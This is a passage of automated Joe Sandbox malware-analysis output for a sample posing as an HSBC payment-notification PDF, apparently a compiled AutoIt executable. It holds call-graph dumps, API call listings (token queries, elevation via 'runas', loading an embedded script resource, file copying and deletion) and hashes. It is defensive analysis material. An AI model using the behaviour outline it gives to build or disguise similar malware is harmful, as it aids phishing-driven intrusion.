46991b 95 API calls 181199->181405 181394 404e89 CreateStreamOnHGlobal 181200->181394 181209 404cd5 181201->181209 181204 404f0b 74 API calls 181204->181209 181206 404d69 181206->181068 181207 43d8a7 181208 404ee5 85 API calls 181207->181208 181210 43d8bb 181208->181210 181209->181204 181209->181206 181209->181207 181400 404ee5 
181209->181400 181211 404f0b 74 API calls 181210->181211 181211->181206 181213 404f1d 181212->181213 181216 43d9cd 181212->181216 181429 4255e2 181213->181429 181217 469109 181627 468f5f 181217->181627 181219 46911f 181219->181076 181221 43d990 181220->181221 181222 404ed6 181220->181222 181632 425c60 181222->181632 181224 404ede 181224->181078 181226 404bd0 181225->181226 181227 404c0c LoadLibraryA 181225->181227 181226->181179 181226->181182 181227->181226 181228 404c1d GetProcAddress 181227->181228 181228->181226 181232 42527c __setmode 181229->181232 181230 42528f 181278 428b28 58 API calls __getptd_noexit 181230->181278 181232->181230 181234 4252c0 181232->181234 181233 425294 181279 428db6 9 API calls __setmode 181233->181279 181248 4304e8 181234->181248 181237 4252c5 181238 4252db 181237->181238 181239 4252ce 181237->181239 181240 425305 181238->181240 181241 4252e5 181238->181241 181280 428b28 58 API calls __getptd_noexit 181239->181280 181263 430607 181240->181263 181281 428b28 58 API calls __getptd_noexit 181241->181281 181245 42529f @_EH4_CallFilterFunc@8 __setmode 181245->181185 181249 4304f4 __setmode 181248->181249 181250 429c0b __lock 58 API calls 181249->181250 181259 430502 181250->181259 181251 43057d 181288 42881d 58 API calls 2 library calls 181251->181288 181254 4305f3 __setmode 181254->181237 181255 430584 181261 430576 181255->181261 181289 429e2b InitializeCriticalSectionAndSpinCount 181255->181289 181256 429c93 __mtinitlocknum 58 API calls 181256->181259 181259->181251 181259->181256 181259->181261 181286 426c50 59 API calls __lock 181259->181286 181287 426cba LeaveCriticalSection LeaveCriticalSection _doexit 181259->181287 181260 4305aa EnterCriticalSection 181260->181261 181283 4305fe 181261->181283 181272 430627 __wopenfile 181263->181272 181264 430641 181294 428b28 58 API calls __getptd_noexit 181264->181294 181266 430646 181295 428db6 9 API calls __setmode 181266->181295 181267 4307fc 181267->181264 181270 43085f 181267->181270 181269 
425310 181282 425332 LeaveCriticalSection LeaveCriticalSection _fseek 181269->181282 181291 4385a1 181270->181291 181272->181264 181272->181267 181272->181272 181296 4237cb 60 API calls 2 library calls 181272->181296 181274 4307f5 181274->181267 181297 4237cb 60 API calls 2 library calls 181274->181297 181276 430814 181276->181267 181298 4237cb 60 API calls 2 library calls 181276->181298 181278->181233 181279->181245 181280->181245 181281->181245 181282->181245 181290 429d75 LeaveCriticalSection 181283->181290 181285 430605 181285->181254 181286->181259 181287->181259 181288->181255 181289->181260 181290->181285 181299 437d85 181291->181299 181293 4385ba 181293->181269 181294->181266 181295->181269 181296->181274 181297->181276 181298->181267 181301 437d91 __setmode 181299->181301 181300 437da7 181384 428b28 58 API calls __getptd_noexit 181300->181384 181301->181300 181304 437ddd 181301->181304 181303 437dac 181385 428db6 9 API calls __setmode 181303->181385 181310 437e4e 181304->181310 181307 437df9 181386 437e22 LeaveCriticalSection __unlock_fhandle 181307->181386 181309 437db6 __setmode 181309->181293 181311 437e6e 181310->181311 181312 4244ea __wsopen_nolock 58 API calls 181311->181312 181314 437e8a 181312->181314 181313 437fc1 181315 428dc6 __invoke_watson 8 API calls 181313->181315 181314->181313 181317 437ec4 181314->181317 181324 437ee7 181314->181324 181316 4385a0 181315->181316 181318 437d85 __wsopen_helper 103 API calls 181316->181318 181319 428af4 __wsopen_nolock 58 API calls 181317->181319 181320 4385ba 181318->181320 181321 437ec9 181319->181321 181320->181307 181322 428b28 __setmode 58 API calls 181321->181322 181323 437ed6 181322->181323 181326 428db6 __setmode 9 API calls 181323->181326 181325 437fa5 181324->181325 181331 437f83 181324->181331 181327 428af4 __wsopen_nolock 58 API calls 181325->181327 181328 437ee0 181326->181328 181329 437faa 181327->181329 181328->181307 181330 428b28 __setmode 58 API calls 181329->181330 181332 437fb7 
181330->181332 181334 42d294 __alloc_osfhnd 61 API calls 181331->181334 181333 428db6 __setmode 9 API calls 181332->181333 181333->181313 181335 438051 181334->181335 181336 43805b 181335->181336 181337 43807e 181335->181337 181339 428af4 __wsopen_nolock 58 API calls 181336->181339 181338 437cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 181337->181338 181348 4380a0 181338->181348 181340 438060 181339->181340 181342 428b28 __setmode 58 API calls 181340->181342 181341 43811e GetFileType 181343 43816b 181341->181343 181344 438129 GetLastError 181341->181344 181346 43806a 181342->181346 181356 42d52a __set_osfhnd 59 API calls 181343->181356 181347 428b07 __dosmaperr 58 API calls 181344->181347 181345 4380ec GetLastError 181349 428b07 __dosmaperr 58 API calls 181345->181349 181350 428b28 __setmode 58 API calls 181346->181350 181351 438150 CloseHandle 181347->181351 181348->181341 181348->181345 181352 437cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 181348->181352 181353 438111 181349->181353 181350->181328 181351->181353 181354 43815e 181351->181354 181355 4380e1 181352->181355 181358 428b28 __setmode 58 API calls 181353->181358 181357 428b28 __setmode 58 API calls 181354->181357 181355->181341 181355->181345 181361 438189 181356->181361 181359 438163 181357->181359 181358->181313 181359->181353 181360 438344 181360->181313 181364 438517 CloseHandle 181360->181364 181361->181360 181362 4318c1 __lseeki64_nolock 60 API calls 181361->181362 181378 43820a 181361->181378 181363 4381f3 181362->181363 181367 428af4 __wsopen_nolock 58 API calls 181363->181367 181363->181378 181365 437cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 181364->181365 181366 43853e 181365->181366 181369 438546 GetLastError 181366->181369 181370 438572 181366->181370 181367->181378 181368 430e5b 70 API calls __read_nolock 181368->181378 181371 428b07 __dosmaperr 58 API calls 181369->181371 181370->181313 181372 438552 181371->181372 181375 42d43d 
__free_osfhnd 59 API calls 181372->181375 181373 430add __close_nolock 61 API calls 181373->181378 181374 43823c 181376 4397a2 __chsize_nolock 82 API calls 181374->181376 181374->181378 181375->181370 181376->181374 181377 42d886 __write 78 API calls 181377->181378 181378->181360 181378->181368 181378->181373 181378->181374 181378->181377 181379 4383c1 181378->181379 181381 4318c1 60 API calls __lseeki64_nolock 181378->181381 181380 430add __close_nolock 61 API calls 181379->181380 181382 4383c8 181380->181382 181381->181378 181383 428b28 __setmode 58 API calls 181382->181383 181383->181313 181384->181303 181385->181309 181386->181309 181388 404b83 181387->181388 181389 404c3f LoadLibraryA 181387->181389 181388->181191 181388->181192 181389->181388 181390 404c50 GetProcAddress 181389->181390 181390->181388 181392 420db6 Mailbox 59 API calls 181391->181392 181393 405240 181392->181393 181393->181197 181395 404ea3 FindResourceExW 181394->181395 181397 404ec0 181394->181397 181396 43d933 LoadResource 181395->181396 181395->181397 181396->181397 181398 43d948 SizeofResource 181396->181398 181397->181198 181398->181397 181399 43d95c LockResource 181398->181399 181399->181397 181401 404ef4 181400->181401 181402 43d9ab 181400->181402 181406 42584d 181401->181406 181404 404f02 181404->181209 181405->181198 181407 425859 __setmode 181406->181407 181408 42586b 181407->181408 181410 425891 181407->181410 181419 428b28 58 API calls __getptd_noexit 181408->181419 181421 426c11 181410->181421 181412 425870 181420 428db6 9 API calls __setmode 181412->181420 181413 425897 181427 4257be 83 API calls 5 library calls 181413->181427 181416 4258a6 181428 4258c8 LeaveCriticalSection LeaveCriticalSection _fseek 181416->181428 181417 42587b __setmode 181417->181404 181419->181412 181420->181417 181422 426c43 EnterCriticalSection 181421->181422 181423 426c21 181421->181423 181425 426c39 181422->181425 181423->181422 181424 426c29 181423->181424 181426 429c0b __lock 58 API calls 
181424->181426 181425->181413 181426->181425 181427->181416 181428->181417 181432 4255fd 181429->181432 181431 404f2e 181431->181217 181433 425609 __setmode 181432->181433 181434 42564c 181433->181434 181435 425644 __setmode 181433->181435 181441 42561f _memset 181433->181441 181436 426c11 __lock_file 59 API calls 181434->181436 181435->181431 181438 425652 181436->181438 181445 42541d 181438->181445 181439 425639 181460 428db6 9 API calls __setmode 181439->181460 181459 428b28 58 API calls __getptd_noexit 181441->181459 181448 425438 _memset 181445->181448 181452 425453 181445->181452 181446 425443 181557 428b28 58 API calls __getptd_noexit 181446->181557 181448->181446 181450 425493 181448->181450 181448->181452 181450->181452 181453 4255a4 _memset 181450->181453 181462 4246e6 181450->181462 181469 430e5b 181450->181469 181537 430ba7 181450->181537 181559 430cc8 58 API calls 3 library calls 181450->181559 181461 425686 LeaveCriticalSection LeaveCriticalSection _fseek 181452->181461 181560 428b28 58 API calls __getptd_noexit 181453->181560 181457 425448 181558 428db6 9 API calls __setmode 181457->181558 181459->181439 181460->181435 181461->181435 181463 4246f0 181462->181463 181464 424705 181462->181464 181561 428b28 58 API calls __getptd_noexit 181463->181561 181464->181450 181466 4246f5 181562 428db6 9 API calls __setmode 181466->181562 181468 424700 181468->181450 181470 430e93 181469->181470 181471 430e7c 181469->181471 181473 4315cb 181470->181473 181477 430ecd 181470->181477 181572 428af4 58 API calls __getptd_noexit 181471->181572 181588 428af4 58 API calls __getptd_noexit 181473->181588 181474 430e81 181573 428b28 58 API calls __getptd_noexit 181474->181573 181480 430ed5 181477->181480 181487 430eec 181477->181487 181478 4315d0 181589 428b28 58 API calls __getptd_noexit 181478->181589 181574 428af4 58 API calls __getptd_noexit 181480->181574 181481 430ee1 181590 428db6 9 API calls __setmode 181481->181590 181482 430e88 181482->181450 181484 430eda 181575 
428b28 58 API calls __getptd_noexit 181484->181575 181486 430f01 181576 428af4 58 API calls __getptd_noexit 181486->181576 181487->181482 181487->181486 181489 430f1b 181487->181489 181491 430f39 181487->181491 181489->181486 181495 430f26 181489->181495 181577 42881d 58 API calls 2 library calls 181491->181577 181493 430f49 181496 430f51 181493->181496 181497 430f6c 181493->181497 181563 435c6b 181495->181563 181578 428b28 58 API calls __getptd_noexit 181496->181578 181580 4318c1 60 API calls 3 library calls 181497->181580 181498 43103a 181500 4310b3 ReadFile 181498->181500 181505 431050 GetConsoleMode 181498->181505 181503 431593 GetLastError 181500->181503 181504 4310d5 181500->181504 181502 430f56 181579 428af4 58 API calls __getptd_noexit 181502->181579 181507 4315a0 181503->181507 181508 431093 181503->181508 181504->181503 181512 4310a5 181504->181512 181509 4310b0 181505->181509 181510 431064 181505->181510 181586 428b28 58 API calls __getptd_noexit 181507->181586 181514 431099 181508->181514 181581 428b07 58 API calls 3 library calls 181508->181581 181509->181500 181510->181509 181513 43106a ReadConsoleW 181510->181513 181512->181514 181520 43110a 181512->181520 181523 431377 181512->181523 181513->181512 181516 43108d GetLastError 181513->181516 181514->181482 181519 422d55 _free 58 API calls 181514->181519 181515 4315a5 181587 428af4 58 API calls __getptd_noexit 181515->181587 181516->181508 181519->181482 181522 431176 ReadFile 181520->181522 181528 4311f7 181520->181528 181525 431197 GetLastError 181522->181525 181535 4311a1 181522->181535 181523->181514 181524 43147d ReadFile 181523->181524 181530 4314a0 GetLastError 181524->181530 181536 4314ae 181524->181536 181525->181535 181526 4312b4 181531 431264 MultiByteToWideChar 181526->181531 181584 4318c1 60 API calls 3 library calls 181526->181584 181527 4312a4 181583 428b28 58 API calls __getptd_noexit 181527->181583 181528->181514 181528->181526 181528->181527 181528->181531 181530->181536 
184052->184054 184053->184052 184057 40558c 184053->184057 184058 46325e 184054->184058 184055 46328d 184055->183878 184059 405ab8 59 API calls 184057->184059 184058->184055 184078 4631fa ReadFile SetFilePointerEx 184058->184078 184079 407924 59 API calls 2 library calls 184058->184079 184061 46337e 184059->184061 184062 4054d2 61 API calls 184061->184062 184063 46338c 184062->184063 184065 46339c Mailbox 184063->184065 184080 4077da 61 API calls Mailbox 184063->184080 184065->183878 184067 409a87 184066->184067 184069 409a48 184066->184069 184068 408047 59 API calls 184067->184068 184071 409a5b 184068->184071 184070 420db6 Mailbox 59 API calls 184069->184070 184070->184071 184071->183883 184072->183857 184073->183884 184074->183851 184075->183851 184076->183877 184077->183882 184078->184058 184079->184058 184080->184065 184081->183925 184082->183972 184083->183934 184084->183969 184085->183969 184086->183993 184087->183993 184089 4560e8 184088->184089 184090 4560cb 184088->184090 184089->184013 184090->184089 184092 4560ab 59 API calls Mailbox 184090->184092 184092->184090
                                                                                                                                                    APIs
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,02F15563), ref: 02F181EB
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,02F15563), ref: 02F18227
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,02F15563), ref: 02F1826F
                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,?,?,?,?,02F15563), ref: 02F18280
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,02F15563), ref: 02F1828E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
                                                                                                                                                    • String ID: $j@h
                                                                                                                                                    • API String ID: 2078281146-3739420905
                                                                                                                                                    • Opcode ID: 17837a5d2175a558fc134f7162f2adb9c8bbb5706557b97ba6e0f204a16f8628
                                                                                                                                                    • Instruction ID: 98658d9d965373a03bca0160adf6bcb765380bac14f61200016134cefb2d6887
                                                                                                                                                    • Opcode Fuzzy Hash: 17837a5d2175a558fc134f7162f2adb9c8bbb5706557b97ba6e0f204a16f8628
                                                                                                                                                    • Instruction Fuzzy Hash: 6E233A71E0C3809FEB378B28C854776BBA46F913E8F8C4599EB8687292D375D904C752

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                      • Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346
                                                                                                                                                      • Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                                                                                      • Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                                                                                      • Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
                                                                                                                                                      • Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                                                                                      • Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                                                                                      • Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                                                                                      • Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16
                                                                                                                                                      • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                                                                                      • Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                                                                                      • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                                                                                      • Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                                                                                      • Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
                                                                                                                                                      • Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%I
                                                                                                                                                    • API String ID: 529118366-2806069697
                                                                                                                                                    • Opcode ID: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                                                                                                                    • Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
                                                                                                                                                    • Opcode Fuzzy Hash: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
                                                                                                                                                    • Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 004049CD
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
                                                                                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00404AA1
                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404AF2
                                                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00404B23
                                                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00404B2F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1986165174-0
                                                                                                                                                    • Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                                                                                    • Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
                                                                                                                                                    • Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
                                                                                                                                                    • Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
                                                                                                                                                    • LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                    • String ID: SCRIPT
                                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                    • String ID: pbL$%I
                                                                                                                                                    • API String ID: 3964851224-1578263234
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
                                                                                                                                                    • API String ID: 0-2838938394
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0046447B
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046448B
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 48322524-0
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
                                                                                                                                                    • timeGetTime.WINMM ref: 00410D16
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00410E61
                                                                                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
                                                                                                                                                    • DestroyWindow.USER32 ref: 00410F06
                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00445C60
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00445C6E
                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
                                                                                                                                                    • API String ID: 4212290369-1082885916
                                                                                                                                                    APIs
                                                                                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 02F158C7
                                                                                                                                                    • CreateThread.KERNEL32(00000000), ref: 02F15915
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$CreateExitUser
                                                                                                                                                    • String ID: gfff
                                                                                                                                                    • API String ID: 4108186749-1553575800

Control-flow Graph

APIs
  • Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69
  • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
• __wsplitpath.LIBCMT ref: 00469234
  • Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B
• _wcscpy.LIBCMT ref: 00469247
• _wcscat.LIBCMT ref: 0046925A
• __wsplitpath.LIBCMT ref: 0046927F
• _wcscat.LIBCMT ref: 00469295
• _wcscat.LIBCMT ref: 004692A8
  • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
  • Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED
• _wcscmp.LIBCMT ref: 004691EF
  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
  • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
• _wcsncpy.LIBCMT ref: 004694C5
• DeleteFileW.KERNEL32(?,?), ref: 004694FB
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00403074
• RegisterClassExW.USER32(00000030), ref: 0040309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
• InitCommonControlsEx.COMCTL32(?), ref: 004030CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
• LoadIconW.USER32(000000A9), ref: 004030F2
